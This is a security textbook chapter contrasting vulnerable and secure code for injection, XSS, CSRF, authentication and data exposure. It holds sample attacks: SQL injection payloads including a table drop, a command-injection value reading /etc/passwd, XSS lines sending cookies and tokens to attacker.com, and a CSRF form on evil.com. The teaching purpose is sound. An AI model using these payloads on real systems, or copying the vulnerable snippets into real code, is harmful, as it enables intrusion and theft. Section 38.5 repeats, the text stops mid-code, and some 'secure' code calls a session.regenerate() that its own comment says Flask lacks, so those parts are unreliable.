# **Chapter 38: Common Security Vulnerabilities**

---

## **38.1 Injection Attacks**

### **Overview**

Injection attacks occur when untrusted user input is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization. Injection vulnerabilities are consistently ranked as the most critical security risk in the OWASP Top 10.

### **38.1.1 SQL Injection (SQLi)**

**What is SQL Injection?**

SQL Injection is a code injection technique where malicious SQL statements are inserted into application queries via user input fields. This allows attackers to view, modify, or delete database contents, bypass authentication, and sometimes execute operating system commands.

**How It Works:**

When an application constructs SQL queries by concatenating user input directly into the query string without proper sanitization or parameterization, attackers can inject SQL syntax to alter the query logic.

**Vulnerable Code Example:**

```python
# VULNERABLE CODE - DO NOT USE
import sqlite3
from flask import Flask, request

app = Flask(__name__)

@app.route('/login', methods=['POST'])
def login_vulnerable():
    username = request.form['username']
    password = request.form['password']
    
    # DANGEROUS: Direct string concatenation
    query = f"SELECT * FROM users WHERE username='{username}' AND password='{password}'"
    
    conn = sqlite3.connect('database.db')
    cursor = conn.cursor()
    cursor.execute(query)  # Executes malicious SQL
    
    user = cursor.fetchone()
    if user:
        return "Login successful!"
    return "Login failed!"
```

**Attack Scenario:**

An attacker enters the following credentials:
- **Username:** `admin'--`
- **Password:** `anything`

The resulting SQL query becomes:
```sql
SELECT * FROM users WHERE username='admin'--' AND password='anything'
```

The `--` comments out the rest of the query, effectively bypassing password verification and logging in as admin.

**Secure Code Example:**

```python
# SECURE CODE - USE PARAMETERIZED QUERIES
@app.route('/login', methods=['POST'])
def login_secure():
    username = request.form['username']
    password = request.form['password']
    
    # SECURE: Parameterized query - input treated as data, not code
    query = "SELECT * FROM users WHERE username=? AND password=?"
    
    conn = sqlite3.connect('database.db')
    cursor = conn.cursor()
    cursor.execute(query, (username, password))  # Parameters passed separately
    
    user = cursor.fetchone()
    if user:
        return "Login successful!"
    return "Login failed!"
```

**Types of SQL Injection:**

1. **In-band (Classic) SQLi:**
   - **Error-based:** Extracts information from database error messages
   - **Union-based:** Uses UNION SQL operator to combine results

2. **Blind SQLi:**
   - **Boolean-based:** True/false questions to infer data
   - **Time-based:** Uses delays (SLEEP) to infer information

3. **Out-of-band SQLi:**
   - Uses different channel (DNS, HTTP) to retrieve data
   - Used when in-band is not possible

**Testing for SQL Injection:**

```python
# Automated SQL Injection Testing Example
import requests

class SQLInjectionTester:
    def __init__(self, target_url):
        self.target_url = target_url
        self.payloads = [
            "' OR '1'='1",
            "' OR 1=1--",
            "' UNION SELECT null,null,null--",
            "1' AND 1=1--",
            "1' AND 1=2--",
            "'; DROP TABLE users;--",
            "' OR 'x'='x",
            "1 AND 1=1",
            "1 AND 1=2"
        ]
    
    def test_parameter(self, param_name):
        """
        Test a specific parameter for SQL injection
        """
        results = []
        
        for payload in self.payloads:
            # Test with payload
            params = {param_name: payload}
            response = requests.get(self.target_url, params=params)
            
            # Check for SQL error indicators
            error_indicators = [
                "sql syntax",
                "mysql_fetch",
                "ORA-",
                "Microsoft SQL Server",
                "PostgreSQL",
                "SQLite",
                "syntax error"
            ]
            
            is_vulnerable = any(
                indicator.lower() in response.text.lower() 
                for indicator in error_indicators
            )
            
            results.append({
                "payload": payload,
                "status_code": response.status_code,
                "vulnerable": is_vulnerable,
                "response_length": len(response.text)
            })
        
        return results
    
    def generate_report(self, results):
        """
        Generate security test report
        """
        vulnerable_count = sum(1 for r in results if r["vulnerable"])
        
        report = f"""
        SQL INJECTION TEST REPORT
        =========================
        Target: {self.target_url}
        Total Payloads Tested: {len(results)}
        Vulnerabilities Found: {vulnerable_count}
        
        Risk Level: {'HIGH' if vulnerable_count > 0 else 'LOW'}
        
        Recommendations:
        1. Use parameterized queries/prepared statements
        2. Implement input validation and sanitization
        3. Apply principle of least privilege for database accounts
        4. Use ORM frameworks that handle escaping automatically
        5. Implement Web Application Firewall (WAF)
        """
        
        return report

# Usage
# tester = SQLInjectionTester("http://example.com/login")
# results = tester.test_parameter("username")
# print(tester.generate_report(results))
```

### **38.1.2 Command Injection**

**What is Command Injection?**

Command injection occurs when an application passes unsafe user-supplied data (forms, cookies, HTTP headers) to a system shell. Attackers can execute arbitrary operating system commands on the host server.

**Vulnerable Code Example:**

```python
# VULNERABLE - Command Injection
import subprocess
from flask import Flask, request

app = Flask(__name__)

@app.route('/ping', methods=['POST'])
def ping_host_vulnerable():
    host = request.form['host']
    
    # DANGEROUS: Direct shell execution with user input
    # Attacker can inject commands with ; && || etc.
    result = subprocess.check_output(f"ping -c 4 {host}", shell=True)
    
    return result.decode()

# Attack: host = "google.com; cat /etc/passwd"
# Result: Executes ping AND dumps password file
```

**Secure Code Example:**

```python
# SECURE - Prevent Command Injection
import subprocess
import re
from flask import Flask, request

app = Flask(__name__)

@app.route('/ping', methods=['POST'])
def ping_host_secure():
    host = request.form['host']
    
    # VALIDATION: Whitelist allowed characters (hostname format)
    if not re.match(r'^[a-zA-Z0-9\-\.]+$', host):
        return "Invalid hostname format", 400
    
    # SECURE: Use list instead of shell=True, no shell interpretation
    # Each argument is passed separately, no command injection possible
    result = subprocess.check_output(['ping', '-c', '4', host])
    
    return result.decode()

# Alternative: Use dedicated libraries instead of shell commands
import pythonping  # Pure Python ping implementation

def ping_alternative(host):
    # No shell involved, completely safe
    response = pythonping.ping(host, count=4)
    return str(response)
```

### **38.1.3 LDAP Injection**

**What is LDAP Injection?**

LDAP (Lightweight Directory Access Protocol) injection occurs when untrusted input is concatenated into LDAP queries. Attackers can modify LDAP statements to bypass authentication, escalate privileges, or extract sensitive directory information.

**Vulnerable Code Example:**

```python
# VULNERABLE - LDAP Injection
import ldap
from flask import Flask, request

app = Flask(__name__)

@app.route('/login', methods=['POST'])
def ldap_login_vulnerable():
    username = request.form['username']
    password = request.form['password']
    
    conn = ldap.initialize('ldap://directory.company.com')
    
    # DANGEROUS: Direct concatenation into LDAP filter
    # Attacker can inject LDAP filters
    search_filter = f"(uid={username})(password={password})"
    
    result = conn.search_s('ou=users,dc=company,dc=com',
                          ldap.SCOPE_SUBTREE,
                          search_filter)
    
    if result:
        return "Login successful!"
    return "Login failed!"

# Attack: username = "*)(uid=*))(&(uid=*"
# This creates filter: (uid=*)(uid=*))(&(uid=*)(password=...)
# Which matches any user, bypassing authentication!
```

**Secure Code Example:**

```python
# SECURE - LDAP Injection Prevention
import ldap
import re
from flask import Flask, request

app = Flask(__name__)

def sanitize_ldap_input(user_input):
    """
    Escape special LDAP characters to prevent injection
    """
    # LDAP special characters that need escaping
    special_chars = {
        '\\': '\\5c',
        '*': '\\2a',
        '(': '\\28',
        ')': '\\29',
        '\x00': '\\00',  # null character
    }
    
    sanitized = user_input
    for char, escape_seq in special_chars.items():
        sanitized = sanitized.replace(char, escape_seq)
    
    return sanitized

@app.route('/login', methods=['POST'])
def ldap_login_secure():
    username = request.form['username']
    password = request.form['password']
    
    # VALIDATION: Whitelist allowed characters
    if not re.match(r'^[a-zA-Z0-9_\-]+$', username):
        return "Invalid username format", 400
    
    # SANITIZATION: Escape LDAP special characters in password
    safe_password = sanitize_ldap_input(password)
    
    conn = ldap.initialize('ldap://directory.company.com')
    
    # SECURE: Use sanitized input in filter
    # Even if password contains special chars, they're escaped
    search_filter = f"(uid={username})(userPassword={safe_password})"
    
    try:
        result = conn.search_s('ou=users,dc=company,dc=com',
                              ldap.SCOPE_SUBTREE,
                              search_filter)
        
        if result:
            return "Login successful!"
        return "Login failed!"
    except ldap.LDAPError as e:
        # Don't expose internal error details
        return "Authentication error", 500
```

---

## **38.2 Cross-Site Scripting (XSS)**

### **Overview**

Cross-Site Scripting (XSS) is a type of injection attack where malicious scripts are injected into trusted websites. XSS occurs when an application includes untrusted data in a web page without proper validation or escaping. XSS allows attackers to execute scripts in the victim's browser, which can hijack user sessions, deface websites, or redirect users to malicious sites.

**Why is XSS Dangerous?**
- Steals session cookies (impersonate users)
- Captures keystrokes (steal passwords)
- Defaces websites
- Redirects users to phishing sites
- Downloads malware
- Performs actions on behalf of users (CSRF combined with XSS)

### **Types of XSS**

#### **38.2.1 Stored XSS (Persistent XSS)**

**How it works:** The malicious script is permanently stored on the target server (database, message forum, visitor log, comment field). The script executes when a user visits the infected page.

**Attack Scenario:**
1. Attacker posts a comment on a blog: `<script>document.location='https://attacker.com/steal?cookie='+document.cookie</script>`
2. Comment is saved to database
3. Every user who views the comment has their cookie sent to attacker's server

**Vulnerable Code Example:**

```python
# VULNERABLE - Stored XSS
from flask import Flask, request, render_template_string
import sqlite3

app = Flask(__name__)

@app.route('/post_comment', methods=['POST'])
def post_comment_vulnerable():
    username = request.form['username']
    comment = request.form['comment']
    
    # DANGEROUS: Storing raw user input without sanitization
    conn = sqlite3.connect('blog.db')
    cursor = conn.cursor()
    cursor.execute(
        "INSERT INTO comments (username, comment) VALUES (?, ?)",
        (username, comment)
    )
    conn.commit()
    
    return "Comment posted!"

@app.route('/view_comments')
def view_comments_vulnerable():
    conn = sqlite3.connect('blog.db')
    cursor = conn.cursor()
    cursor.execute("SELECT username, comment FROM comments")
    comments = cursor.fetchall()
    
    # DANGEROUS: Rendering user input directly in HTML
    html = "<h1>Comments</h1>"
    for username, comment in comments:
        html += f"<div><strong>{username}</strong>: {comment}</div>"
    
    return render_template_string(html)

# Attack: Post comment with <script>alert('XSS')</script>
# Every visitor will see the alert popup!
```

**Secure Code Example:**

```python
# SECURE - XSS Prevention
from flask import Flask, request, render_template_string
from markupsafe import escape  # Flask's built-in escaping
import bleach  # HTML sanitization library
import sqlite3

app = Flask(__name__)

# Whitelist of allowed HTML tags (if rich text is needed)
ALLOWED_TAGS = ['b', 'i', 'em', 'strong', 'a']
ALLOWED_ATTRIBUTES = {'a': ['href', 'title']}

@app.route('/post_comment', methods=['POST'])
def post_comment_secure():
    username = request.form['username']
    comment = request.form['comment']
    
    # VALIDATION: Check input length and format
    if not username or len(username) > 50:
        return "Invalid username", 400
    
    # SANITIZATION: Clean HTML if allowing rich text, or escape if plain text
    # Option 1: Allow some HTML but sanitize
    clean_comment = bleach.clean(comment, tags=ALLOWED_TAGS, attributes=ALLOWED_ATTRIBUTES)
    
    # Option 2: Store raw but escape on output (shown in view function)
    
    conn = sqlite3.connect('blog.db')
    cursor = conn.cursor()
    cursor.execute(
        "INSERT INTO comments (username, comment) VALUES (?, ?)",
        (username, clean_comment)
    )
    conn.commit()
    
    return "Comment posted securely!"

@app.route('/view_comments')
def view_comments_secure():
    conn = sqlite3.connect('blog.db')
    cursor = conn.cursor()
    cursor.execute("SELECT username, comment FROM comments")
    comments = cursor.fetchall()
    
    # SECURE: Always escape output to prevent XSS
    html = "<h1>Comments</h1>"
    for username, comment in comments:
        # escape() converts <script> to &lt;script&gt; - harmless text
        safe_username = escape(username)
        safe_comment = escape(comment)
        html += f"<div><strong>{safe_username}</strong>: {safe_comment}</div>"
    
    return render_template_string(html)

# Even if attacker posts <script>alert('XSS')</script>,
# it displays as text, not executes!
```

#### **38.2.2 Reflected XSS (Non-Persistent XSS)**

**How it works:** The malicious script comes from the current HTTP request. The application immediately includes the malicious script in the response in an unsafe way. The attack is "reflected" off the web server to the victim's browser.

**Attack Scenario:**
1. Attacker crafts a malicious URL: `https://site.com/search?q=<script>stealCookie()</script>`
2. Attacker sends URL to victim via email/chat
3. Victim clicks link, browser sends request to server
4. Server includes the script in the response (e.g., "You searched for: [script]")
5. Victim's browser executes the script

**Vulnerable Code Example:**

```python
# VULNERABLE - Reflected XSS
@app.route('/search')
def search_vulnerable():
    query = request.args.get('q', '')
    
    # DANGEROUS: Reflecting user input directly in response
    return f"""
    <html>
        <body>
            <h1>Search Results</h1>
            <p>You searched for: {query}</p>
            <div>Results here...</div>
        </body>
    </html>
    """

# Attack URL: /search?q=<script>alert(document.cookie)</script>
# Result: Cookie displayed in alert box
```

**Secure Code Example:**

```python
# SECURE - Reflected XSS Prevention
from markupsafe import escape

@app.route('/search')
def search_secure():
    query = request.args.get('q', '')
    
    # VALIDATION: Limit length
    if len(query) > 200:
        query = query[:200]
    
    # SANITIZATION: Escape special HTML characters
    safe_query = escape(query)
    
    # Alternative: Use template engine auto-escaping (Jinja2, etc.)
    return f"""
    <html>
        <body>
            <h1>Search Results</h1>
            <p>You searched for: {safe_query}</p>
            <div>Results here...</div>
        </body>
    </html>
    """
```

#### **38.2.3 DOM-Based XSS**

**How it works:** The vulnerability exists in client-side code (JavaScript) rather than server-side code. The attack occurs when the application writes user-controlled data to the DOM (Document Object Model) using unsafe methods like `innerHTML`, `document.write()`, or client-side URL manipulation.

**Attack Scenario:**
1. Application uses JavaScript to read URL fragment (`#`) or query parameters
2. JavaScript writes this data to the page using `innerHTML` or similar
3. Attacker crafts URL with malicious script in fragment
4. When victim visits URL, client-side JavaScript executes the script

**Vulnerable Code Example:**

```javascript
// VULNERABLE - DOM-based XSS
// URL: http://site.com/page#<img src=x onerror=alert(1)>

// Dangerous: Reading from URL and writing to DOM unsafely
function displayUserInput() {
    // Get value from URL fragment (after #)
    var userInput = window.location.hash.substring(1);
    
    // DANGEROUS: Using innerHTML with user-controlled data
    document.getElementById('welcome').innerHTML = "Welcome, " + userInput;
    
    // Also dangerous:
    // document.write("Welcome, " + userInput);
    // eval(userInput);
    // setTimeout(userInput, 1000);
}

// Attack: URL ends with #<script>alert(document.cookie)</script>
// Or: #<img src=x onerror=fetch('http://attacker.com/steal?c='+localStorage.getItem('token'))>
```

**Secure Code Example:**

```javascript
// SECURE - DOM-based XSS Prevention
function displayUserInputSecure() {
    var userInput = window.location.hash.substring(1);
    
    // VALIDATION: Only allow alphanumeric
    if (!/^[a-zA-Z0-9]+$/.test(userInput)) {
        userInput = "Guest";
    }
    
    // SECURE: Use textContent instead of innerHTML
    // textContent treats input as text, not HTML
    document.getElementById('welcome').textContent = "Welcome, " + userInput;
    
    // Alternative: Create elements safely
    var welcomeDiv = document.getElementById('welcome');
    welcomeDiv.innerHTML = ''; // Clear if needed
    var textNode = document.createTextNode("Welcome, " + userInput);
    welcomeDiv.appendChild(textNode);
}

// Additional secure practices:
// 1. Use URLSearchParams for query strings
const params = new URLSearchParams(window.location.search);
const safeValue = params.get('param'); // Automatically decodes

// 2. Use DOMPurify for sanitization if HTML is necessary
// import DOMPurify from 'dompurify';
// clean = DOMPurify.sanitize(dirty);
```

### **XSS Prevention Summary**

| Prevention Technique | Description | Implementation |
|---------------------|-------------|----------------|
| **Output Encoding** | Convert special characters to HTML entities | Use `escape()`, `htmlspecialchars()`, template auto-escaping |
| **Input Validation** | Whitelist allowed characters/patterns | Regex validation, type checking |
| **Content Security Policy** | Browser-level XSS protection | CSP headers to restrict script sources |
| **HttpOnly Cookies** | Prevent JavaScript access to cookies | Set `HttpOnly` flag on sensitive cookies |
| **XSS Protection Headers** | Legacy browser protection | `X-XSS-Protection: 1; mode=block` |

---

## **38.3 Cross-Site Request Forgery (CSRF)**

### **Overview**

Cross-Site Request Forgery (CSRF or XSRF) is an attack that tricks the victim into submitting a malicious request to a web application in which they are currently authenticated. Unlike XSS, which exploits the trust a user has in a particular site, CSRF exploits the trust that a website has in the user's browser.

**The Attack Flow:**
1. User logs into legitimate site (bank.com) and receives authentication cookie
2. User visits malicious site (evil.com) in another tab
3. Evil.com contains a form or image tag that submits to bank.com/transfer
4. Browser automatically includes bank.com cookies with the request
5. Bank.com processes the request as legitimate because of valid session

### **Vulnerable Code Example**

```python
# VULNERABLE - CSRF
from flask import Flask, request, session, redirect
import sqlite3

app = Flask(__name__)
app.secret_key = 'secret'

@app.route('/transfer', methods=['POST'])
def transfer_money_vulnerable():
    # No CSRF token validation!
    if 'user_id' not in session:
        return "Not logged in", 401
    
    to_account = request.form['to_account']
    amount = request.form['amount']
    
    # Process transfer...
    conn = sqlite3.connect('bank.db')
    cursor = conn.cursor()
    cursor.execute(
        "UPDATE accounts SET balance = balance - ? WHERE user_id = ?",
        (amount, session['user_id'])
    )
    cursor.execute(
        "UPDATE accounts SET balance = balance + ? WHERE account_number = ?",
        (amount, to_account)
    )
    conn.commit()
    
    return f"Transferred ${amount} to account {to_account}"

# Attacker's malicious HTML (hosted on evil.com):
"""
<form action="https://bank.com/transfer" method="POST" id="csrf-form">
    <input type="hidden" name="to_account" value="ATTACKER_ACCOUNT">
    <input type="hidden" name="amount" value="10000">
</form>
<script>document.getElementById('csrf-form').submit();</script>
"""
```

### **Secure Code Example**

```python
# SECURE - CSRF Protection
from flask import Flask, request, session, redirect
from flask_wtf.csrf import CSRFProtect
import secrets
import sqlite3

app = Flask(__name__)
app.secret_key = 'secret'
csrf = CSRFProtect(app)  # Enable CSRF protection globally

@app.route('/transfer', methods=['POST'])
def transfer_money_secure():
    # CSRF token automatically validated by Flask-WTF
    # If token missing or invalid, request is rejected with 400
    
    if 'user_id' not in session:
        return "Not logged in", 401
    
    to_account = request.form['to_account']
    amount = request.form['amount']
    
    # Validate inputs
    if not to_account.isdigit() or len(to_account) != 10:
        return "Invalid account number", 400
    
    try:
        amount = float(amount)
        if amount <= 0 or amount > 10000:
            return "Invalid amount", 400
    except ValueError:
        return "Invalid amount format", 400
    
    # Additional security: Re-authenticate for sensitive operations
    if request.form.get('confirm_password') != get_user_password(session['user_id']):
        return "Password confirmation required", 403
    
    # Process transfer...
    conn = sqlite3.connect('bank.db')
    cursor = conn.cursor()
    # ... transaction logic ...
    
    return f"Transferred ${amount} to account {to_account}"

# HTML Form with CSRF Token:
"""
<form action="/transfer" method="POST">
    <!-- CSRF token automatically included by Flask-WTF -->
    <input type="hidden" name="csrf_token" value="{{ csrf_token() }}">
    
    <label>To Account:</label>
    <input type="text" name="to_account" pattern="[0-9]{10}" required>
    
    <label>Amount:</label>
    <input type="number" name="amount" min="1" max="10000" required>
    
    <label>Confirm Password:</label>
    <input type="password" name="confirm_password" required>
    
    <button type="submit">Transfer</button>
</form>
"""
```

### **CSRF Prevention Techniques**

| Technique | Implementation | Effectiveness |
|-----------|---------------|-------------|
| **CSRF Tokens** | Unique, unpredictable token per session/form | High - Industry standard |
| **SameSite Cookies** | Set `SameSite=Strict` or `SameSite=Lax` on cookies | High - Modern browsers |
| **Referer Header** | Validate request origin | Medium - Can be spoofed |
| **Double Submit Cookie** | Token in cookie and request parameter | Medium - Good for stateless APIs |
| **Custom Headers** | Require specific headers (X-Requested-With) | Low-Medium - Defense in depth |

---

## **38.4 Broken Authentication**

### **Overview**

Broken authentication vulnerabilities occur when authentication mechanisms are implemented incorrectly, allowing attackers to compromise passwords, keys, session tokens, or exploit implementation flaws to assume other users' identities. This is currently #2 in the OWASP Top 10.

**Common Weaknesses:**
- Permits automated attacks (credential stuffing, brute force)
- Weak password policies
- Weak or ineffective credential recovery
- Storing passwords in plain text or weak hashing
- Missing or ineffective multi-factor authentication
- Exposing session IDs in URLs
- Not invalidating sessions after logout/timeout

### **Vulnerable Code Examples**

```python
# VULNERABILITY 1: Weak Password Storage
import hashlib

def store_password_weak(password):
    """
    DANGEROUS: MD5 is cryptographically broken and too fast
    Rainbow tables can crack these in seconds
    """
    # NEVER use MD5 or SHA1 for passwords
    hash_value = hashlib.md5(password.encode()).hexdigest()
    return hash_value

# VULNERABILITY 2: No Rate Limiting
from flask import Flask, request, session
import time

app = Flask(__name__)

login_attempts = {}  # In-memory storage (should be Redis in production)

@app.route('/login', methods=['POST'])
def login_no_protection():
    username = request.form['username']
    password = request.form['password']
    
    # DANGEROUS: No protection against brute force attacks
    # Attacker can try thousands of passwords per second
    if check_credentials(username, password):
        session['user'] = username
        return "Login successful!"
    return "Invalid credentials"

# VULNERABILITY 3: Session Fixation
@app.route('/login', methods=['POST'])
def login_session_fixation():
    username = request.form['username']
    password = request.form['password']
    
    if check_credentials(username, password):
        # DANGEROUS: Not regenerating session ID after login
        # Attacker could have set session ID beforehand (fixation)
        session['user'] = username
        return "Login successful!"
    return "Invalid credentials"

# VULNERABILITY 4: Insecure Session Timeout
@app.route('/sensitive_action', methods=['POST'])
def sensitive_action():
    if 'user' in session:
        # DANGEROUS: No check for session age
        # Session could be days old, stolen, or from public computer
        perform_sensitive_action()
        return "Action completed"
    return "Not logged in"
```

### **Secure Implementation**

```python
# SECURE: Authentication Best Practices
from flask import Flask, request, session
from werkzeug.security import generate_password_hash, check_password_hash
import hashlib
import secrets
import time
from functools import wraps
import redis

app = Flask(__name__)
app.secret_key = 'your-secret-key-here'

# Use Redis for rate limiting storage
redis_client = redis.Redis(host='localhost', port=6379, db=0)

# SECURE 1: Strong Password Hashing
def hash_password_secure(password):
    """
    Use Werkzeug's generate_password_hash (PBKDF2 with SHA256)
    or bcrypt/Argon2 for even better security
    """
    # Method: pbkdf2:sha256 with 260000 iterations (configurable)
    return generate_password_hash(password, method='pbkdf2:sha256', salt_length=16)

def verify_password(stored_hash, provided_password):
    """
    Verify password against stored hash
    """
    return check_password_hash(stored_hash, provided_password)

# SECURE 2: Rate Limiting
def rate_limit(max_attempts=5, window=300):  # 5 attempts per 5 minutes
    def decorator(f):
        @wraps(f)
        def decorated_function(*args, **kwargs):
            # Use IP + username combination for rate limiting
            client_ip = request.remote_addr
            username = request.form.get('username', 'unknown')
            key = f"login_attempts:{client_ip}:{username}"
            
            attempts = redis_client.get(key)
            if attempts and int(attempts) >= max_attempts:
                return "Too many login attempts. Please try again later.", 429
            
            result = f(*args, **kwargs)
            
            # Increment attempt counter on failure
            if "Invalid" in str(result):
                pipe = redis_client.pipeline()
                pipe.incr(key)
                pipe.expire(key, window)
                pipe.execute()
            
            return result
        return decorated_function
    return decorator

# SECURE 3: Session Management
@app.route('/login', methods=['POST'])
@rate_limit(max_attempts=5, window=300)
def login_secure():
    username = request.form['username']
    password = request.form['password']
    
    # Verify credentials (pseudo-code)
    user = get_user_from_db(username)
    if not user or not verify_password(user.password_hash, password):
        # Generic error message (don't reveal if username exists)
        return "Invalid username or password", 401
    
    # CRITICAL: Regenerate session ID to prevent session fixation
    session.regenerate()  # Flask doesn't have built-in regenerate, implement manually
    
    # Clear old session completely
    session.clear()
    
    # Set new session data
    session['user_id'] = user.id
    session['username'] = user.username
    session['login_time'] = time.time()
    session['ip_address'] = request.remote_addr
    
    # Set secure session cookie flags
    response = app.make_response("Login successful")
    response.set_cookie('session', session.sid, 
                       httponly=True,  # Prevent JavaScript access
                       secure=True,    # HTTPS only
                       samesite='Lax') # CSRF protection
    return response

# SECURE 4: Session Validation and Timeout
@app.before_request
def check_session_validity():
    if 'user_id' in session:
        # Check session age (30 minutes)
        if time.time() - session.get('login_time', 0) > 1800:
            session.clear()
            return "Session expired. Please login again.", 401
        
        # Check IP binding (optional, prevents session theft)
        if session.get('ip_address') != request.remote_addr:
            session.clear()
            return "Session invalid.", 401
        
        # Regenerate session ID periodically (every 5 minutes)
        if time.time() - session.get('last_regeneration', 0) > 300:
            session['last_regeneration'] = time.time()
            # Implementation would regenerate session ID

@app.route('/logout', methods=['POST'])
def logout_secure():
    # Proper session termination
    session.clear()
    response = app.make_response("Logged out successfully")
    response.delete_cookie('session')
    return response
```

---

## **38.5 Sensitive Data Exposure**

### **Overview**

Sensitive data exposure occurs when applications fail to adequately protect sensitive information such as financial data, healthcare records, passwords, or personal information. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes.

**Common Data Protection Failures:**
- Storing passwords in plain text or weak hashing (MD5/SHA1)
- Transmitting sensitive data over HTTP instead of HTTPS
- Using weak encryption algorithms (DES, RC4) or weak keys
- Storing sensitive data unnecessarily
- Improper caching of sensitive data
- Logging sensitive information
- Weak API keys or tokens in code repositories

### **Vulnerable Code Examples**

```python
# VULNERABILITY 1: Plain Text Password Storage
def register_user_insecure(username, password):
    """
    DANGEROUS: Storing passwords in plain text
    Database breach exposes all passwords immediately
    """
    conn = sqlite3.connect('app.db')
    cursor = conn.cursor()
    
    # NEVER store passwords in plain text!
    cursor.execute(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        (username, password)  # Plain text password!
    )
    conn.commit()

# VULNERABILITY 2: Weak Hashing (MD5/SHA1)
import hashlib

def hash_password_weak(password):
    """
    DANGEROUS: MD5 and SHA1 are too fast and vulnerable to rainbow tables
    """
    # MD5 is cryptographically broken and unsuitable for password storage
    return hashlib.md5(password.encode()).hexdigest()

# VULNERABILITY 3: Hardcoded Secrets
class PaymentGateway:
    """
    DANGEROUS: Hardcoded API keys in source code
    """
    API_KEY = "sk_live_51H7xYZABC123XYZ"  # Hardcoded secret!
    API_SECRET = "whsec_1234567890abcdef"
    
    def process_payment(self, amount):
        # Using hardcoded credentials
        headers = {"Authorization": f"Bearer {self.API_KEY}"}
        # ... API call ...

# VULNERABILITY 4: Insecure Data Transmission
@app.route('/login', methods=['POST'])
def login_insecure():
    username = request.form['username']
    password = request.form['password']
    
    # DANGEROUS: No HTTPS, credentials sent in plain text
    # Also logging sensitive data
    print(f"User login attempt: {username} with password: {password}")  # Never log passwords!
    
    # Check credentials...
    return "Logged in"

# VULNERABILITY 5: Improper Error Messages
@app.route('/user/<username>')
def get_user_insecure(username):
    try:
        user = db.get_user(username)
        if not user:
            # DANGEROUS: Revealing whether username exists
            return "User not found", 404
        
        # DANGEROUS: Exposing sensitive fields
        return {
            "username": user.username,
            "password_hash": user.password_hash,  # Never expose!
            "ssn": user.social_security_number,   # Never expose!
            "email": user.email
        }
    except Exception as e:
        # DANGEROUS: Detailed error messages reveal internal structure
        return f"Database error: {str(e)}", 500
```

### **Secure Implementation**

```python
# SECURE: Password Storage with Argon2 (Recommended) or bcrypt
from argon2 import PasswordHasher
from argon2.exceptions import VerifyMismatchError

# Initialize Argon2 hasher
ph = PasswordHasher(
    time_cost=3,      # Number of iterations
    memory_cost=65536, # 64 MB
    parallelism=1,    # Number of parallel threads
    hash_len=32,      # Length of hash
    salt_len=16       # Length of random salt
)

def hash_password_secure(password):
    """
    SECURE: Argon2id hashing (winner of Password Hashing Competition)
    - Automatically handles salting
    - Memory-hard (resistant to GPU/ASIC attacks)
    - Adaptive (can increase cost over time)
    """
    try:
        # Hash the password
        hash_string = ph.hash(password)
        return hash_string
    except Exception as e:
        # Log error securely (don't leak details)
        logger.error("Password hashing failed")
        raise

def verify_password_secure(hash_string, password):
    """
    Verify password against Argon2 hash
    """
    try:
        ph.verify(hash_string, password)
        
        # Check if rehashing needed (parameters upgraded)
        if ph.check_needs_rehash(hash_string):
            new_hash = ph.hash(password)
            update_password_hash_in_db(new_hash)
        
        return True
    except VerifyMismatchError:
        return False

# SECURE: Environment Variables for Secrets
import os
from dotenv import load_dotenv

load_dotenv()  # Load from .env file (not committed to git)

class PaymentGatewaySecure:
    """
    SECURE: Secrets stored in environment variables
    """
    def __init__(self):
        self.api_key = os.getenv('PAYMENT_API_KEY')
        self.api_secret = os.getenv('PAYMENT_API_SECRET')
        
        if not self.api_key or not self.api_secret:
            raise ValueError("Payment API credentials not configured")
    
    def process_payment(self, amount, currency='USD'):
        headers = {
            "Authorization": f"Bearer {self.api_key}",
            "Content-Type": "application/json"
        }
        
        payload = {
            "amount": amount,
            "currency": currency,
            "timestamp": int(time.time())
        }
        
        # Sign request with secret for integrity
        signature = hmac.new(
            self.api_secret.encode(),
            json.dumps(payload).encode(),
            hashlib.sha256
        ).hexdigest()
        
        headers['X-Signature'] = signature
        
        # Make secure HTTPS request
        response = requests.post(
            'https://api.paymentgateway.com/v1/charges',
            headers=headers,
            json=payload,
            timeout=30,
            verify=True  # Verify SSL certificate
        )
        
        return response.json()

# SECURE: HTTPS and Secure Headers
from flask import Flask, request, redirect, make_response
from flask_talisman import Talisman  # Forces HTTPS and secure headers

app = Flask(__name__)

# Force HTTPS and set security headers
Talisman(app, 
         force_https=True,
         strict_transport_security=True,
         content_security_policy={
             'default-src': "'self'",
             'script-src': "'self'",
             'style-src': "'self' 'unsafe-inline'"
         })

@app.route('/login', methods=['POST'])
def login_secure_transmission():
    username = request.form['username']
    password = request.form['password']
    
    # Log securely - never log passwords!
    app.logger.info(f"Login attempt for user: {username}")
    # NEVER: logger.info(f"Password entered: {password}")
    
    # Verify credentials...
    if authenticate(username, password):
        response = make_response("Login successful")
        
        # Secure cookie settings
        response.set_cookie(
            'session_id',
            generate_secure_session_id(),
            httponly=True,      # Prevent JavaScript access
            secure=True,        # HTTPS only
            samesite='Lax',     # CSRF protection
            max_age=3600        # 1 hour expiration
        )
        return response
    
    # Generic error message (don't reveal if username exists)
    return "Invalid username or password", 401

# SECURE: Information Disclosure Prevention
@app.route('/user/<username>')
def get_user_secure(username):
    try:
        user = db.get_user(username)
        if not user:
            # Same message whether user doesn't exist or no permission
            return "User not found or access denied", 404
        
        # Only return necessary fields
        return {
            "username": user.username,
            "email": user.email  # Consider if email should be public
            # NEVER include: password_hash, ssn, internal_id, etc.
        }
        
    except Exception as e:
        # Log detailed error internally
        app.logger.error(f"Database error: {str(e)}", exc_info=True)
        # Return generic message to user
        return "An error occurred", 500
```

---

## **38.5 Sensitive Data Exposure**

### **Overview**

Sensitive data exposure occurs when applications fail to adequately protect sensitive information such as financial data, healthcare records, authentication credentials, or personally identifiable information (PII). Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes.

**Data Classification:**
- **Public:** No harm if disclosed
- **Internal:** Minor harm if disclosed (business plans)
- **Confidential:** Significant harm (customer data, financials)
- **Restricted:** Severe harm (passwords, encryption keys, SSNs)

### **Protection Strategies**

```python
# SECURE: Data Encryption at Rest
from cryptography.fernet import Fernet
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2
import base64
import os

class DataEncryption:
    def __init__(self, master_key):
        """
        Initialize with master key for encryption
        """
        self.master_key = master_key.encode()
    
    def encrypt_sensitive_data(self, data: str, context: str = "default") -> dict:
        """
        Encrypt sensitive data with context-specific keys
        """
        # Generate salt for this encryption
        salt = os.urandom(16)
        
